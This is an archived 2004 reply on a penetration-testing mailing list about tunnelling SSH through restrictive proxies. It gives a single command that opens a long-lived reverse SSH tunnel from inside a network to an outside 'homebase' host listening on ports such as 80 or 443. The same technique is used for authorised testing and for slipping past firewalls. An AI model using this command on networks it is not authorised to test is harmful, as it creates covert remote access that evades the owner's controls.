Re: Pushing SSH tunnels over TELNET proxies
From: Nathan R. Valentine (nathan_at_nathanvalentine.org)
Date: 02/16/04
- Previous message: Sekurity Wizard: "Pushing SSH tunnels over TELNET proxies"
- In reply to: Sekurity Wizard: "Pushing SSH tunnels over TELNET proxies"
- Next in thread: Ryan Mack: "Re: Pushing SSH tunnels over TELNET proxies"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: pen-test@securityfocus.com Date: Mon, 16 Feb 2004 11:19:10 -0500
I think that this is what you are asking...
Set <homebase> with SSH listening on telnet port, 80, 443. From inside
network:
ssh -R8022:localhost:22 <homebase> -p <outbound port> -f 'sleep 1024d'
-- Nathan R. Valentine <nathan@nathanvalentine.org>
- application/pgp-signature attachment: This is a digitally signed message part
- Previous message: Sekurity Wizard: "Pushing SSH tunnels over TELNET proxies"
- In reply to: Sekurity Wizard: "Pushing SSH tunnels over TELNET proxies"
- Next in thread: Ryan Mack: "Re: Pushing SSH tunnels over TELNET proxies"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]